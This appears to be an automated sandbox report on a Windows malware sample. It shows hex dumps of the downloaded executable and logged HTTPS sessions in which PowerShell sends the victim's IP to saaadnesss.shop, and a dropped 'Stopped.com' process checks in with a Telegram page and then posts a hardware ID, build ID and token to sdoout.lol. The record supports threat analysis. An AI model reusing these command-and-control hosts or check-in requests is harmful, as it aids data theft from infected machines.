                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 58 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 b0 07 00 00 42 00 00 83 38 00 00 00 10 00
                                                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELX|NnB8
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC1378INData Raw: 82 40 00 ff 75 0c 57 ff d6 ff 75 14 ff d3 8d 45 a4 50 ff 75 08 ff 15 a0 82 40 00 5f 5e 33 c0 5b c9 c2 10 00 8b 4c 24 04 a1 e8 2d 47 00 8b d1 69 d2 20 40 00 00 8b 54 02 08 f6 c2 02 74 55 56 57 8d 71 01 33 ff 3b 35 ec 2d 47 00 73 44 8b ce 69 c9 20 40 00 00 8d 44 01 08 53 8b 08 f6 c1 02 74 03 47 eb 1e f6 c1 04 74 09 8b cf 4f 85 c9 74 20 eb 10 f6 c1 10 75 0b 8b d9 33 da 83 e3 01 33 d9 89 18 46 05 20 40 00 00 3b 35 ec 2d 47 00 72 ca 5b 5f 5e c2 04 00 55 8b ec 51 51 8b 55 08 53 8b 1d e8 2d 47 00 56 8b f2 69 f6 20 40 00 00 03 f3 8b 46 08 33 c9 57 89 4d fc 89 4d f8 a8 02 74 0c 39 4d 0c 74 07 83 e0 be 89 46 08 42 3b 15 ec 2d 47 00 73 44 8b c2 69 c0 20 40 00 00 8d 7c 18 08 8b 0f 8d 42 01 f6 c1 02 74 0a 6a 01 52 e8 a4 ff ff ff 8b 0f f6 c1 04 75 28 f6 c1 40 74 03 ff
                                                                                                                                                                                                                                                                                            Data Ascii: @uWuEPu@_^3[L$-Gi @TtUVWq3;5-GsDi @DStGtOt u33F @;5-Gr[_^UQQUS-GVi @F3WMMt9MtFB;-GsDi @|BtjRu(@t
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC1378INData Raw: 4b 00 00 59 ff 75 f4 ff 15 40 82 40 00 e9 0d 1a 00 00 8b c2 39 5d dc 75 25 8b 0c 85 80 2e 47 00 89 0c 85 40 2e 47 00 33 c9 41 e8 53 fd ff ff 8b 4d d4 89 04 8d 80 2e 47 00 e9 e1 19 00 00 8b 0c 85 40 2e 47 00 89 0c 85 80 2e 47 00 e9 ce 19 00 00 8b 75 dc 8d 34 b5 80 2e 47 00 8b 0e 33 c0 3b cb 0f 94 c0 23 4d e0 89 0e 8b 44 85 d4 e9 b8 19 00 00 ff 34 8d 80 2e 47 00 e9 9b 19 00 00 a1 a0 ad 46 00 8b 35 44 82 40 00 3b c3 74 07 51 50 ff d6 8b 55 d4 a1 8c ad 46 00 3b c3 0f 84 7e 19 00 00 52 50 ff d6 e9 75 19 00 00 6a f0 e8 e7 fc ff ff ff 75 d8 8b f0 56 68 f4 8e 40 00 e8 1e 4b 00 00 83 c4 0c ff 75 d8 56 ff 15 88 80 40 00 85 c0 0f 85 49 19 00 00 c7 45 fc 01 00 00 00 68 c0 8e 40 00 e8 f8 4a 00 00 59 e9 32 19 00 00 6a f0 e8 a4 fc ff ff ff 75 d8 89 45 08 50 68 88 8e 40
                                                                                                                                                                                                                                                                                            Data Ascii: KYu@@9]u%.G@.G3ASM.G@.G.Gu4.G3;#MD4.GF5D@;tQPUF;~RPujuVh@KuV@IEh@JY2juEPh@
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC1378INData Raw: 4b 00 00 56 68 84 8a 40 00 e8 6f 46 00 00 59 59 68 10 00 20 00 56 e8 5f 40 00 00 e9 ec f9 ff ff 53 e8 10 f8 ff ff 8b f0 56 68 68 8a 40 00 e8 4a 46 00 00 59 59 ff 75 d8 56 e8 37 50 00 00 e9 7a 14 00 00 6a 31 e8 ec f7 ff ff 8b f0 56 ff 75 d4 68 40 8a 40 00 e8 23 46 00 00 83 c4 0c ff 75 d4 56 e8 14 40 00 00 3b c3 0f 84 7f fd ff ff 3b 45 dc 75 08 8b 45 e0 e9 4d 14 00 00 3b 45 e4 0f 85 39 14 00 00 8b 45 e8 e9 3c 14 00 00 6a f0 e8 a3 f7 ff ff 8b f0 56 68 28 8a 40 00 eb 91 6a 01 e8 92 f7 ff ff 50 e8 4f 43 00 00 e9 07 14 00 00 6a 02 59 e8 69 f7 ff ff 6a 03 59 89 45 08 e8 5e f7 ff ff 6a 01 8b f8 e8 6b f7 ff ff 33 c9 89 45 bc 66 89 0e 39 5d dc 74 09 39 5d 08 0f 84 dc 13 00 00 50 e8 12 43 00 00 3b fb 7d 08 03 f8 0f 88 ca 13 00 00 3b f8 7e 02 8b f8 8b 45 bc 8d 04 78
                                                                                                                                                                                                                                                                                            Data Ascii: KVh@oFYYh V_@SVhh@JFYYuV7Pzj1Vuh@@#FuV@;;EuEM;E9E<jVh(@jPOCjYijYE^jk3Ef9]t9]PC;};~Ex
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC1378INData Raw: 39 5d dc 74 0b 68 b8 89 40 00 e8 0c 41 00 00 59 57 56 39 5d e0 75 0b ff 15 44 82 40 00 e9 39 0f 00 00 ff 15 80 82 40 00 e9 2e 0f 00 00 53 e8 a1 f2 ff ff 6a 31 8b f0 e8 98 f2 ff ff 6a 22 8b d8 e8 8f f2 ff ff 6a 15 8b f8 e8 86 f2 ff ff 68 d0 f0 40 00 6a ec e8 90 2d 00 00 0f b7 07 ff 75 e0 f7 d8 1b c0 23 c7 68 b0 b0 4c 00 50 0f b7 06 f7 d8 1b c0 53 23 c6 50 ff 75 f4 ff 15 88 81 40 00 83 f8 21 7d 16 50 57 53 56 68 40 89 40 00 e8 88 40 00 00 83 c4 14 e9 f0 f7 ff ff 57 53 56 68 d8 88 40 00 e8 73 40 00 00 83 c4 10 e9 ab 0e 00 00 53 e8 1e f2 ff ff 8b f0 56 68 b0 88 40 00 e8 58 40 00 00 59 59 56 6a eb e8 1d 2d 00 00 56 e8 e4 39 00 00 89 45 08 56 3b c3 74 5f 68 84 88 40 00 e8 36 40 00 00 59 59 39 5d dc 74 46 8b 35 28 81 40 00 eb 07 6a 0f e8 af 40 00 00 6a 64 ff 75
                                                                                                                                                                                                                                                                                            Data Ascii: 9]th@AYWV9]uD@9@.Sj1j"jh@j-u#hLPS#Pu@!}PWSVh@@@WSVh@s@SVh@X@YYVj-V9EV;t_h@6@YY9]tF5(@j@jdu
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC1378INData Raw: a4 50 ff 15 8c 81 40 00 85 c0 0f 84 e9 09 00 00 eb 9d 81 fa 0d f0 ad 0b 0f 85 dc f7 ff ff ff 05 94 2e 47 00 e9 d0 09 00 00 68 e0 85 40 00 be d0 f0 40 00 56 89 5d f0 89 5d ec 89 5d 08 e8 dd 38 00 00 56 bf d8 30 41 00 57 e8 d1 38 00 00 39 5d d4 74 09 53 e8 19 ed ff ff 89 45 f0 39 5d d8 74 0a 6a 11 e8 0a ed ff ff 89 45 ec 39 5d e4 74 0a 6a 22 e8 fb ec ff ff 89 45 08 6a cd e8 f1 ec ff ff 8b d8 53 57 56 68 c8 b0 40 00 68 98 85 40 00 e8 24 3b 00 00 83 c4 14 53 ff 75 08 ff 75 ec ff 75 f0 ff 15 40 81 40 00 e9 74 f2 ff ff a1 8c 85 40 00 89 45 b8 a1 90 85 40 00 6a 01 89 45 bc e8 ae ec ff ff 6a 12 8b f8 e8 a5 ec ff ff 6a dd 8b d8 e8 9c ec ff ff 50 68 03 20 00 00 56 8d 45 b8 50 53 57 ff 15 44 81 40 00 8d 45 b8 50 56 ff 15 1c 81 40 00 e9 01 f2 ff ff 51 e8 d7 39 00 00
                                                                                                                                                                                                                                                                                            Data Ascii: P@.Gh@@V]]]8V0AW89]tSE9]tjE9]tj"EjSWVh@h@$;Suuu@@t@E@jEjjPh VEPSWD@EPV@Q9
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC1378INData Raw: 04 00 00 3a 45 0b 74 17 80 7d 0b 0d 74 06 80 7d 0b 0a 75 0b 66 8b 45 f4 66 89 04 77 46 eb 12 6a 01 53 6a ff ff 75 bc ff 15 60 81 40 00 eb 02 8b f3 33 c0 66 89 04 77 3b f3 e9 83 ed ff ff 39 5d dc 74 13 33 c9 41 e8 af e7 ff ff 66 a3 d0 f0 40 00 33 c0 40 eb 0d 6a 11 e8 b3 e7 ff ff 50 e8 70 33 00 00 66 39 1e 0f 84 5b ed ff ff 53 8d 4d 08 51 03 c0 50 68 d0 f0 40 00 56 e8 9f 32 00 00 50 ff 15 54 81 40 00 e9 34 ed ff ff 6a 02 59 e8 67 e7 ff ff 89 45 f8 83 f8 01 0f 8c f8 03 00 00 b9 03 20 00 00 3b c1 7e 03 89 4d f8 66 39 1e 0f 84 7b ff ff ff 56 89 5d cc e8 61 32 00 00 89 45 bc 39 5d f8 0f 8e 66 ff ff ff 8b f3 53 8d 45 ec 50 6a 02 8d 45 08 50 ff 75 bc ff 15 58 81 40 00 85 c0 0f 84 4a ff ff ff 83 7d ec 02 0f 85 40 ff ff ff 39 5d e0 75 30 66 83 7d cc 0d 74 32 66 83
                                                                                                                                                                                                                                                                                            Data Ascii: :Et}t}ufEfwFjSju`@3fw;9]t3Af@3@jPp3f9[SMQPh@V2PT@4jYgE ;~Mf9{V]a2E9]fSEPjEPuX@J}@9]u0f}t2f
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC1378INData Raw: 40 00 65 26 40 00 fc 26 40 00 13 27 40 00 97 27 40 00 e3 27 40 00 80 28 40 00 ff 29 40 00 84 2a 40 00 e2 2a 40 00 fd 2a 40 00 23 2b 40 00 9f 2b 40 00 8a 2c 40 00 d7 2c 40 00 a3 2d 40 00 d6 2d 40 00 f1 2d 40 00 18 2e 40 00 55 2e 40 00 6e 2f 40 00 c0 2f 40 00 49 30 40 00 e3 30 40 00 e3 30 40 00 a9 30 40 00 cf 30 40 00 32 1e 40 00 36 1e 40 00 3a 1e 40 00 3f 1e 40 00 55 1e 40 00 59 1e 40 00 5d 1e 40 00 61 1e 40 00 6c 1e 40 00 79 1e 40 00 81 1e 40 00 8e 1e 40 00 92 1e 40 00 55 8b ec 81 ec 80 00 00 00 81 7d 0c 10 01 00 00 75 19 6a 00 68 fa 00 00 00 6a 01 ff 75 08 ff 15 34 82 40 00 c7 45 0c 13 01 00 00 81 7d 0c 13 01 00 00 75 4c 8b 0d 54 b1 42 00 a1 e0 31 43 00 3b c8 7c 02 8b c8 50 6a 64 51 ff 15 50 81 40 00 50 8d 45 80 68 c8 8f 40 00 50 ff 15 48 82 40 00 83 c4
                                                                                                                                                                                                                                                                                            Data Ascii: @e&@&@'@'@'@(@)@*@*@*@#+@+@,@,@-@-@-@.@U.@n/@/@I0@0@0@0@0@2@6@:@?@U@Y@]@a@l@y@@@@U}ujhju4@E}uLTB1C;|PjdQP@PEh@PH@
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC1378INData Raw: 39 5d fc 74 2a ff 35 54 b1 42 00 e8 48 fc ff ff 6a 04 8d 45 08 50 e8 0b fc ff ff 85 c0 0f 84 92 00 00 00 8b 45 f8 3b 45 08 0f 85 86 00 00 00 ff 75 ec 6a 40 ff 15 24 81 40 00 8b f0 a1 2c 2e 47 00 83 c0 1c 50 e8 0e fc ff ff ff 75 ec 56 53 6a ff e8 19 fc ff ff 3b 45 ec 75 5a f6 45 d8 01 89 35 dc 2d 47 00 8b 06 a3 28 2e 47 00 74 06 ff 05 24 2e 47 00 6a 08 59 8d 46 44 83 e8 08 01 30 49 3b cb 75 f6 6a 01 53 53 ff 75 f4 ff 15 60 81 40 00 89 46 3c 6a 40 83 c6 04 56 68 e0 2d 47 00 e8 58 26 00 00 33 c0 5f 5e 5b c9 c2 04 00 6a 01 e8 0e fb ff ff 59 b8 10 90 40 00 eb ea 56 be c8 70 4d 00 56 e8 60 28 00 00 56 e8 47 25 00 00 85 c0 75 02 5e c3 56 e8 38 2f 00 00 6a 00 56 ff 15 84 80 40 00 56 68 c0 30 4d 00 e8 81 26 00 00 5e c3 55 8b ec 8b 55 08 8b 4d 0c 56 33 c0 2b d1 57
                                                                                                                                                                                                                                                                                            Data Ascii: 9]t*5TBHjEPE;Euj@$@,.GPuVSj;EuZE5-G(.Gt$.GjYFD0I;ujSSu`@F<j@Vh-GX&3_^[jY@VpMV`(VG%u^V8/jV@Vh0M&^UUMV3+W
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:11 UTC1378INData Raw: 74 24 08 ff 56 04 8b 36 59 85 f6 75 f2 5e c2 04 00 56 8b 35 f0 71 43 00 6a 00 e8 d7 ff ff ff 85 f6 74 1a 57 8b fe ff 77 08 8b 36 ff 15 3c 81 40 00 57 ff 15 30 81 40 00 85 f6 75 e8 5f 83 25 f0 71 43 00 00 5e c3 a1 f0 71 43 00 eb 0b 8b 48 08 3b 4c 24 04 74 0a 8b 00 85 c0 75 f1 40 c2 04 00 33 c0 eb f9 56 8b 74 24 08 56 e8 d7 ff ff ff 85 c0 75 03 40 eb 2c 6a 0c 6a 40 ff 15 24 81 40 00 85 c0 74 1b 8b 4c 24 0c 89 48 04 8b 0d f0 71 43 00 89 70 08 89 08 a3 f0 71 43 00 33 c0 eb 03 83 c8 ff 5e c2 08 00 83 7c 24 04 78 75 06 ff 05 94 ad 46 00 6a 00 ff 74 24 08 68 08 04 00 00 ff 35 d4 2d 47 00 ff 15 88 82 40 00 c2 04 00 ff 74 24 0c 6a 00 e8 bb 2a 00 00 50 8b 44 24 0c 05 e8 03 00 00 50 ff 74 24 0c e8 20 1f 00 00 c2 0c 00 83 3d 8c 2e 47 00 00 a1 0c 72 43 00 75 05 a1 1c
                                                                                                                                                                                                                                                                                            Data Ascii: t$V6Yu^V5qCjtWw6<@W0@u_%qC^qCH;L$tu@3Vt$Vu@,jj@$@tL$HqCpqC3^|$xuFjt$h5-G@t$j*PD$Pt$ =.GrCu


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            1192.168.2.54970534.160.111.1454434956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:17 UTC158OUTGET /ip HTTP/1.1
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                            Host: ifconfig.me
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:17 UTC227INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            date: Tue, 31 Dec 2024 15:58:16 GMT
                                                                                                                                                                                                                                                                                            content-type: text/plain
                                                                                                                                                                                                                                                                                            Content-Length: 12
                                                                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:17 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                                                                                                                                                                                            Data Ascii: 8.46.123.189


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            2192.168.2.549706185.121.235.1674434956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:18 UTC220OUTPOST /connect HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                            Host: saaadnesss.shop
                                                                                                                                                                                                                                                                                            Content-Length: 31
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:18 UTC31OUTData Raw: 7b 0d 0a 20 20 20 20 22 69 70 22 3a 20 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0d 0a 7d
                                                                                                                                                                                                                                                                                            Data Ascii: { "ip": "8.46.123.189"}
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:18 UTC161INHTTP/1.1 200
                                                                                                                                                                                                                                                                                            Server: nginx/1.26.2
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:18 GMT
                                                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                                                            Content-Length: 21
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            vary: Origin
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:18 UTC21INData Raw: 7b 22 73 74 61 74 75 73 22 3a 22 53 75 63 63 65 73 73 22 7d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: {"status":"Success"}


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            3192.168.2.549796149.154.167.99443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:43 UTC85OUTGET /w211et HTTP/1.1
                                                                                                                                                                                                                                                                                            Host: t.me
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:43 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:43 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                            Content-Length: 12299
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            Set-Cookie: stel_ssid=34345fb7a2ee455472_5873598072345054781; expires=Wed, 01 Jan 2025 15:58:43 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                                                            Cache-control: no-store
                                                                                                                                                                                                                                                                                            X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                                            Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:43 UTC12299INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 77 32 31 31 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @w211et</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            4192.168.2.549804116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:44 UTC183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:44 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            5192.168.2.549812116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:45 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----jmym7qiw4wlx4e3ozmoz
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 256
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:45 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 6a 6d 79 6d 37 71 69 77 34 77 6c 78 34 65 33 6f 7a 6d 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 38 36 35 41 41 33 33 38 42 30 33 35 35 35 35 31 34 32 33 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 6a 6d 79 6d 37 71 69 77 34 77 6c 78 34 65 33 6f 7a 6d 6f 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6a 6d 79 6d 37 71 69 77 34 77 6c 78 34 65 33 6f 7a 6d 6f 7a 2d 2d 0d
                                                                                                                                                                                                                                                                                            Data Ascii: ------jmym7qiw4wlx4e3ozmozContent-Disposition: form-data; name="hwid"1C865AA338B03555514232-a33c7340-61ca------jmym7qiw4wlx4e3ozmozContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------jmym7qiw4wlx4e3ozmoz--
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:46 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:46 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 3a1|1|1|1|807b30494a239fd367cfd84a7373caf9|1|0|1|1|0|50000|10


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            6192.168.2.549823116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:47 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----fus2nopzua1vaa1vsri5
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:47 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 66 75 73 32 6e 6f 70 7a 75 61 31 76 61 61 31 76 73 72 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 66 75 73 32 6e 6f 70 7a 75 61 31 76 61 61 31 76 73 72 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 66 75 73 32 6e 6f 70 7a 75 61 31 76 61 61 31 76 73 72 69 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------fus2nopzua1vaa1vsri5Content-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------fus2nopzua1vaa1vsri5Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------fus2nopzua1vaa1vsri5Cont
                                                                                                                                                                                                                                                                                            2024-12-31 15:58:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:58:47 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
